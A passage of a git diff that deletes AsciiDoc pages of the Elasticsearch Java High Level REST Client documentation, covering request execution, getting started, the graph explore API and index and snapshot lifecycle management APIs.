-["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- - -Synchronous calls may throw an `IOException` in case of either failing to -parse the REST response in the high-level REST client, the request times out -or similar cases where there is no response coming back from the server. - -In cases where the server returns a `4xx` or `5xx` error code, the high-level -client tries to parse the response body error details instead and then throws -a generic `ElasticsearchException` and adds the original `ResponseException` as a -suppressed exception to it. - -[id="{upid}-{api}-async"] -==== Asynchronous execution - -Executing a +{request}+ can also be done in an asynchronous fashion so that -the client can return directly. Users need to specify how the response or -potential failures will be handled by passing the request and a listener to the -asynchronous {api} method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. Failure scenarios and expected exceptions are the same as in the -synchronous execution case. - -A typical listener for +{api}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole +{request}+ fails. diff --git a/docs/java-rest/high-level/getting-started.asciidoc b/docs/java-rest/high-level/getting-started.asciidoc deleted file mode 100644 index 226bcd0492a..00000000000 --- a/docs/java-rest/high-level/getting-started.asciidoc +++ /dev/null @@ -1,197 +0,0 @@ -[[java-rest-high-getting-started]] -== Getting started - -This section describes how to get started with the high-level REST client from -getting the artifact to using it in an application. - -[[java-rest-high-compatibility]] -=== Compatibility -The Java High Level REST Client requires at least Java 1.8 and depends on the Elasticsearch -core project. The client version is the same as the Elasticsearch version that the -client was developed for. It accepts the same request arguments as the `TransportClient` -and returns the same response objects. See the <> -if you need to migrate an application from `TransportClient` to the new REST client. - -The High Level Client is guaranteed to be able to communicate with any Elasticsearch -node running on the same major version and greater or equal minor version. It -doesn't need to be in the same minor version as the Elasticsearch nodes it -communicates with, as it is forward compatible meaning that it supports -communicating with later versions of Elasticsearch than the one it was developed for. - -The 6.0 client is able to communicate with any 6.x Elasticsearch node, while the 6.1 -client is for sure able to communicate with 6.1, 6.2 and any later 6.x version, but -there may be incompatibility issues when communicating with a previous Elasticsearch -node version, for instance between 6.1 and 6.0, in case the 6.1 client supports new -request body fields for some APIs that are not known by the 6.0 node(s). - -It is recommended to upgrade the High Level Client when upgrading the Elasticsearch -cluster to a new major version, as REST API breaking changes may cause unexpected -results depending on the node that is hit by the request, and newly added APIs will -only be supported by the newer version of the client. The client should always be -updated last, once all of the nodes in the cluster have been upgraded to the new -major version. - -[[java-rest-high-javadoc]] -=== Javadoc - -The javadoc for the REST high level client can be found at {rest-high-level-client-javadoc}/index.html. - -[[java-rest-high-getting-started-maven]] -=== Maven Repository - -The high-level Java REST client is hosted on -https://search.maven.org/search?q=g:org.elasticsearch.client[Maven -Central]. The minimum Java version required is `1.8`. - -The High Level REST Client is subject to the same release cycle as -Elasticsearch. Replace the version with the desired client version. - -If you are looking for a SNAPSHOT version, you should add our snapshot repository to your Maven config: - -["source","xml",subs="attributes"] --------------------------------------------------- - - - es-snapshots - elasticsearch snapshot repo - https://snapshots.elastic.co/maven/ - - --------------------------------------------------- - -or in Gradle: - -["source","groovy",subs="attributes"] --------------------------------------------------- -maven { - url "https://snapshots.elastic.co/maven/" -} --------------------------------------------------- - -[[java-rest-high-getting-started-maven-maven]] -==== Maven configuration - -Here is how you can configure the dependency using maven as a dependency manager. -Add the following to your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch.client - elasticsearch-rest-high-level-client - {version} - --------------------------------------------------- - -[[java-rest-high-getting-started-maven-gradle]] -==== Gradle configuration - -Here is how you can configure the dependency using gradle as a dependency manager. -Add the following to your `build.gradle` file: - -["source","groovy",subs="attributes"] --------------------------------------------------- -dependencies { - compile 'org.elasticsearch.client:elasticsearch-rest-high-level-client:{version}' -} --------------------------------------------------- - -[[java-rest-high-getting-started-maven-lucene]] -==== Lucene Snapshot repository - -The very first releases of any major version (like a beta), might have been built on top of a Lucene Snapshot version. -In such a case you will be unable to resolve the Lucene dependencies of the client. - -For example, if you want to use the `7.0.0-beta1` version which depends on Lucene `8.0.0-snapshot-83f9835`, you must -define the following repository. - -For Maven: - -["source","xml",subs="attributes"] --------------------------------------------------- - - elastic-lucene-snapshots - Elastic Lucene Snapshots - https://s3.amazonaws.com/download.elasticsearch.org/lucenesnapshots/83f9835 - true - false - --------------------------------------------------- - -For Gradle: - -["source","groovy",subs="attributes"] --------------------------------------------------- -maven { - name 'lucene-snapshots' - url 'https://s3.amazonaws.com/download.elasticsearch.org/lucenesnapshots/83f9835' -} --------------------------------------------------- - -[[java-rest-high-getting-started-dependencies]] -=== Dependencies - -The High Level Java REST Client depends on the following artifacts and their -transitive dependencies: - -- org.elasticsearch.client:elasticsearch-rest-client -- org.elasticsearch:elasticsearch - - -[[java-rest-high-getting-started-initialization]] -=== Initialization - -A `RestHighLevelClient` instance needs a <> -to be built as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[rest-high-level-client-init] --------------------------------------------------- - -The high-level client will internally create the low-level client used to -perform requests based on the provided builder. That low-level client -maintains a pool of connections and starts some threads so you should -close the high-level client when you are well and truly done with -it and it will in turn close the internal low-level client to free those -resources. This can be done through the `close`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[rest-high-level-client-close] --------------------------------------------------- - -In the rest of this documentation about the Java High Level Client, the `RestHighLevelClient` instance -will be referenced as `client`. - -[[java-rest-high-getting-started-request-options]] -=== RequestOptions - -All APIs in the `RestHighLevelClient` accept a `RequestOptions` which you can -use to customize the request in ways that won't change how Elasticsearch -executes the request. For example, this is the place where you'd specify a -`NodeSelector` to control which node receives the request. See the -<> for -more examples of customizing the options. - -[[java-rest-high-getting-started-asynchronous-usage]] -=== Asynchronous usage - -All of the methods across the different clients exist in a traditional synchronous and -asynchronous variant. The difference is that the asynchronous ones use asynchronous requests -in the REST Low Level Client. This is useful if you are doing multiple requests or are using e.g. -rx java, Kotlin co-routines, or similar frameworks. - -The asynchronous methods are recognizable by the fact that they have the word "Async" in their name -and return a `Cancellable` instance. The asynchronous methods accept the same request object -as the synchronous variant and accept a generic `ActionListener` where `T` is the return -type of the synchronous method. - -All asynchronous methods return a `Cancellable` object with a `cancel` method that you may call -in case you want to abort the request. Cancelling -no longer needed requests is a good way to avoid putting unnecessary -load on Elasticsearch. - -Using the `Cancellable` instance is optional and you can safely ignore this if you have -no need for this. A use case for this would be using this with e.g. Kotlin's `suspendCancellableCoRoutine`. - diff --git a/docs/java-rest/high-level/graph/explore.asciidoc b/docs/java-rest/high-level/graph/explore.asciidoc deleted file mode 100644 index a178dfbc3a4..00000000000 --- a/docs/java-rest/high-level/graph/explore.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-graph-explore]] -=== X-Pack Graph explore API - -[[java-rest-high-x-pack-graph-explore-execution]] -==== Initial request - -Graph queries are executed using the `explore()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/GraphDocumentationIT.java[x-pack-graph-explore-request] --------------------------------------------------- -<1> In this example we seed the exploration with a query to find messages mentioning the mysterious `projectx` -<2> What we want to discover in these messages are the ids of `participants` in the communications and the md5 hashes -of any attached files. In each case, we want to find people or files that have had at least one document connecting them -to projectx. -<3> The next "hop" in the graph exploration is to find the people who have shared several messages with the people or files -discovered in the previous hop (the projectx conspirators). The `minDocCount` control is used here to ensure the people -discovered have had at least 5 communications with projectx entities. Note we could also supply a "guiding query" here e.g. a -date range to consider only recent communications but we pass null to consider all connections. -<4> Finally we call the graph explore API with the GraphExploreRequest object. - - -==== Response - -Graph responses consist of Vertex and Connection objects (aka "nodes" and "edges" respectively): - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/GraphDocumentationIT.java[x-pack-graph-explore-response] --------------------------------------------------- -<1> Each Vertex is a unique term (a combination of fieldname and term value). The "hopDepth" property tells us at which point in the -requested exploration this term was first discovered. -<2> Each Connection is a pair of Vertex objects and includes a docCount property telling us how many times these two -Vertex terms have been sighted together - - -[[java-rest-high-x-pack-graph-expand-execution]] -==== Expanding a client-side Graph - -Typically once an application has rendered an initial GraphExploreResponse as a collection of vertices and connecting lines (graph visualization toolkits such as D3, sigma.js or Keylines help here) the next step a user may want to do is "expand". This involves finding new vertices that might be connected to the existing ones currently shown. - -To do this we use the same `explore` method but our request contains details about which vertices to expand from and which vertices to avoid re-discovering. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/GraphDocumentationIT.java[x-pack-graph-explore-expand] --------------------------------------------------- -<1> Unlike the initial request we do not need to pass a starting query -<2> In the first hop which represents our "from" vertices we explicitly list the terms that we already have on-screen and want to expand by using the `addInclude` filter. -We can supply a boost for those terms that are considered more important to follow than others but here we select a common value of 1 for all. -<3> When defining the second hop which represents the "to" vertices we hope to discover we explicitly list the terms that we already know about using the `addExclude` filter - diff --git a/docs/java-rest/high-level/ilm/delete_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/delete_lifecycle_policy.asciidoc deleted file mode 100644 index a68a2d9de5b..00000000000 --- a/docs/java-rest/high-level/ilm/delete_lifecycle_policy.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ilm-delete-lifecycle-policy -:request: DeleteLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Delete Lifecycle Policy API allows you to delete an Index Lifecycle -Management Policy from the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The policy named `my_policy` will be deleted. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete lifecycle policy request was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/delete_snapshot_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/delete_snapshot_lifecycle_policy.asciidoc deleted file mode 100644 index 4079ac3dc08..00000000000 --- a/docs/java-rest/high-level/ilm/delete_snapshot_lifecycle_policy.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: slm-delete-snapshot-lifecycle-policy -:request: DeleteSnapshotLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Snapshot Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Delete Snapshot Lifecycle Policy API allows you to delete a Snapshot Lifecycle Management Policy -from the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The policy with the id `policy_id` will be deleted. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete snapshot lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete snapshot lifecycle policy request was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_policy.asciidoc deleted file mode 100644 index b2c36a4e273..00000000000 --- a/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_policy.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: slm-execute-snapshot-lifecycle-policy -:request: ExecuteSnapshotLifecyclePolicyRequest -:response: ExecuteSnapshotLifecyclePolicyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Execute Snapshot Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Execute Snapshot Lifecycle Policy API allows you to execute a Snapshot Lifecycle Management -Policy, taking a snapshot immediately. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The policy id to execute - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the name of the snapshot that was created. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The created snapshot name - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_retention.asciidoc b/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_retention.asciidoc deleted file mode 100644 index 190f7be2092..00000000000 --- a/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_retention.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: slm-execute-snapshot-lifecycle-retention -:request: ExecuteSnapshotLifecycleRetentionRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Execute Snapshot Lifecycle Retention API - - -[id="{upid}-{api}-request"] -==== Request - -The Execute Snapshot Lifecycle Retention API allows you to execute Snapshot Lifecycle Management -Retention immediately, rather than waiting for its regularly scheduled execution. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains a boolean for whether the request was -acknowledged by the master node. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/explain_lifecycle.asciidoc b/docs/java-rest/high-level/ilm/explain_lifecycle.asciidoc deleted file mode 100644 index b85d482299a..00000000000 --- a/docs/java-rest/high-level/ilm/explain_lifecycle.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ --- -:api: ilm-explain-lifecycle -:request: ExplainLifecycleRequest -:response: ExplainLifecycleResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Explain Lifecycle API - - -[id="{upid}-{api}-request"] -==== Request - -The Explain Lifecycle API allows you to retrieve information about the execution -of a Lifecycle Policy with respect to one or more indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Requests an explanation of policy execution for `my_index` and `other_index` - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains a map of `LifecyclePolicyMetadata`, -accessible by the name of the policy, which contains data about each policy, -as well as the policy definition. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The name of the policy in use for this index, if any. Will be `null` if the -index does not have an associated policy. -<2> Indicates whether this index is being managed by Index Lifecycle Management. -<3> The Phase (`hot`, `warm`, etc.) this index is currently in. Will be `null` if -the index is not managed by Index Lifecycle Management. -<4> The time this index entered this Phase of execution. -<5> The Action (`rollover`, `shrink`, etc.) this index is currently in. Will be `null` if -the index is not managed by Index Lifecycle Management. -<6> The Step this index is currently in. Will be `null` if -the index is not managed by Index Lifecycle Management. -<7> If this index is in the `ERROR` Step, this will indicate which Step failed. -Otherwise, it will be `null`. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/get_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/get_lifecycle_policy.asciidoc deleted file mode 100644 index 506c2c736e5..00000000000 --- a/docs/java-rest/high-level/ilm/get_lifecycle_policy.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: ilm-get-lifecycle-policy -:request: GetLifecyclePolicyRequest -:response: GetLifecyclePolicyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Lifecycle Policy API allows you to retrieve the definition of an Index -Lifecycle Management Policy from the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Gets all policies. -<2> Gets `my_policy` and `other_policy` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains a map of `LifecyclePolicyMetadata`, -accessible by the name of the policy, which contains data about each policy, -as well as the policy definition. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The retrieved policies are retrieved by name. -<2> The policy definition itself. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_policy.asciidoc deleted file mode 100644 index da51760961c..00000000000 --- a/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_policy.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: slm-get-snapshot-lifecycle-policy -:request: GetSnapshotLifecyclePolicyRequest -:response: GetSnapshotLifecyclePolicyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Snapshot Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Snapshot Lifecycle Policy API allows you to retrieve the definition of a Snapshot Lifecycle -Management Policy from the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Gets all policies. -<2> Gets `policy_id` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains a map of `SnapshotLifecyclePolicyMetadata`, accessible by the id -of the policy, which contains data about each policy, as well as the policy definition. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The retrieved policies are retrieved by id. -<2> The policy definition itself. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_stats.asciidoc b/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_stats.asciidoc deleted file mode 100644 index c9ff0a9880c..00000000000 --- a/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_stats.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: slm-get-snapshot-lifecycle-stats -:request: GetSnapshotLifecycleStatsRequest -:response: GetSnapshotLifecycleStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Snapshot Lifecycle Stats API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Snapshot Lifecycle Stats API allows you to retrieve statistics about snapshots taken or -deleted, as well as retention runs by the snapshot lifecycle service. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains global statistics as well as a map of `SnapshotPolicyStats`, -accessible by the id of the policy, which contains statistics about each policy. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/lifecycle_management_status.asciidoc b/docs/java-rest/high-level/ilm/lifecycle_management_status.asciidoc deleted file mode 100644 index 6bf4344477e..00000000000 --- a/docs/java-rest/high-level/ilm/lifecycle_management_status.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ilm-status -:request: LifecycleManagementStatusRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Index Lifecycle Management Status API - - -[id="{upid}-{api}-request"] -==== Request - -The Index Lifecycle Management Status API allows you to retrieve the status -of Index Lifecycle Management - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates the status of Index Lifecycle Management. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The returned status can be `RUNNING`, `STOPPING`, or `STOPPED`. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/put_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/put_lifecycle_policy.asciidoc deleted file mode 100644 index 7947f54ffbc..00000000000 --- a/docs/java-rest/high-level/ilm/put_lifecycle_policy.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: ilm-put-lifecycle-policy -:request: PutLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Put Lifecycle Policy API allows you to add an Index Lifecycle Management -Policy to the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Adds a hot phase with a rollover action -<2> Adds a delete phase that will delete in the index 90 days after rollover -<3> Creates the policy with the defined phases and the name `my_policy` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the put lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the put lifecycle policy was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/put_snapshot_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/put_snapshot_lifecycle_policy.asciidoc deleted file mode 100644 index 13a0bb6e782..00000000000 --- a/docs/java-rest/high-level/ilm/put_snapshot_lifecycle_policy.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: slm-put-snapshot-lifecycle-policy -:request: PutSnapshotLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Snapshot Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Put Snapshot Lifecycle Policy API allows you to add of update the definition of a Snapshot -Lifecycle Management Policy in the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the put snapshot lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the put snapshot lifecycle policy was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/remove_lifecycle_policy_from_index.asciidoc b/docs/java-rest/high-level/ilm/remove_lifecycle_policy_from_index.asciidoc deleted file mode 100644 index 4b12e89d6aa..00000000000 --- a/docs/java-rest/high-level/ilm/remove_lifecycle_policy_from_index.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: ilm-remove-lifecycle-policy-from-index -:request: RemoveIndexLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Remove Policy from Index API - - -[id="{upid}-{api}-request"] -==== Request - -Removes the assigned lifecycle policy from an index. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> removes the `my_policy` policy from `my_index` - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to remove -the lifecycle policy from the index was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not there were any policies failed -to be removed from any indices from the request -<2> A list of index names which are still managed -by their policies. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ilm/retry_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/retry_lifecycle_policy.asciidoc deleted file mode 100644 index 2798b1fecfd..00000000000 --- a/docs/java-rest/high-level/ilm/retry_lifecycle_policy.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ilm-retry-lifecycle-policy -:request: RetryLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Retry Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Retry Lifecycle Policy API allows you to invoke execution of policies -that encountered errors in certain indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Retries execution of `my_index`'s policy - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the retry lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the lifecycle policy retry was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/snapshot_lifecycle_management_status.asciidoc b/docs/java-rest/high-level/ilm/snapshot_lifecycle_management_status.asciidoc deleted file mode 100644 index ae6986711bc..00000000000 --- a/docs/java-rest/high-level/ilm/snapshot_lifecycle_management_status.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: slm-status -:request: SnapshotLifecycleManagementStatusRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Snapshot Lifecycle Management Status API - - -[id="{upid}-{api}-request"] -==== Request - -The Snapshot Lifecycle Management Status API allows you to retrieve the status -of Snapshot Lifecycle Management - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates the status of Snapshot Lifecycle Management. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The returned status can be `RUNNING`, `STOPPING`, or `STOPPED`. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/start_lifecycle_management.asciidoc b/docs/java-rest/high-level/ilm/start_lifecycle_management.asciidoc deleted file mode 100644 index 20a77259663..00000000000 --- a/docs/java-rest/high-level/ilm/start_lifecycle_management.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ilm-start-ilm -:request: StartILMRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start Index Lifecycle Management API - - -[id="{upid}-{api}-request"] -==== Request - -The Start Lifecycle Management API allows you to start Index Lifecycle -Management if it has previously been stopped. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to start Index Lifecycle -Management was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to start Index Lifecycle Management was -acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ilm/start_snapshot_lifecycle_management.asciidoc b/docs/java-rest/high-level/ilm/start_snapshot_lifecycle_management.asciidoc deleted file mode 100644 index b359f237ea5..00000000000 --- a/docs/java-rest/high-level/ilm/start_snapshot_lifecycle_management.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: slm-start-slm -:request: StartSLMRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start Snapshot Lifecycle Management API - - -[id="{upid}-{api}-request"] -==== Request - -The Start Snapshot Lifecycle Management API allows you to start Snapshot -Lifecycle Management if it has previously been stopped. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to start Snapshot Lifecycle -Management was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to start Snapshot Lifecycle Management was -acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ilm/stop_lifecycle_management.asciidoc b/docs/java-rest/high-level/ilm/stop_lifecycle_management.asciidoc deleted file mode 100644 index 04c30e1012f..00000000000 --- a/docs/java-rest/high-level/ilm/stop_lifecycle_management.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: ilm-stop-ilm -:request: StopILMRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop Index Lifecycle Management API - - -[id="{upid}-{api}-request"] -==== Request - -The Stop Lifecycle Management API allows you to stop Index Lifecycle -Management temporarily. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to stop Index Lifecycle -Management was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to stop Index Lifecycle Management was -acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/stop_snapshot_lifecycle_management.asciidoc b/docs/java-rest/high-level/ilm/stop_snapshot_lifecycle_management.asciidoc deleted file mode 100644 index 3f54341d430..00000000000 --- a/docs/java-rest/high-level/ilm/stop_snapshot_lifecycle_management.asciidoc 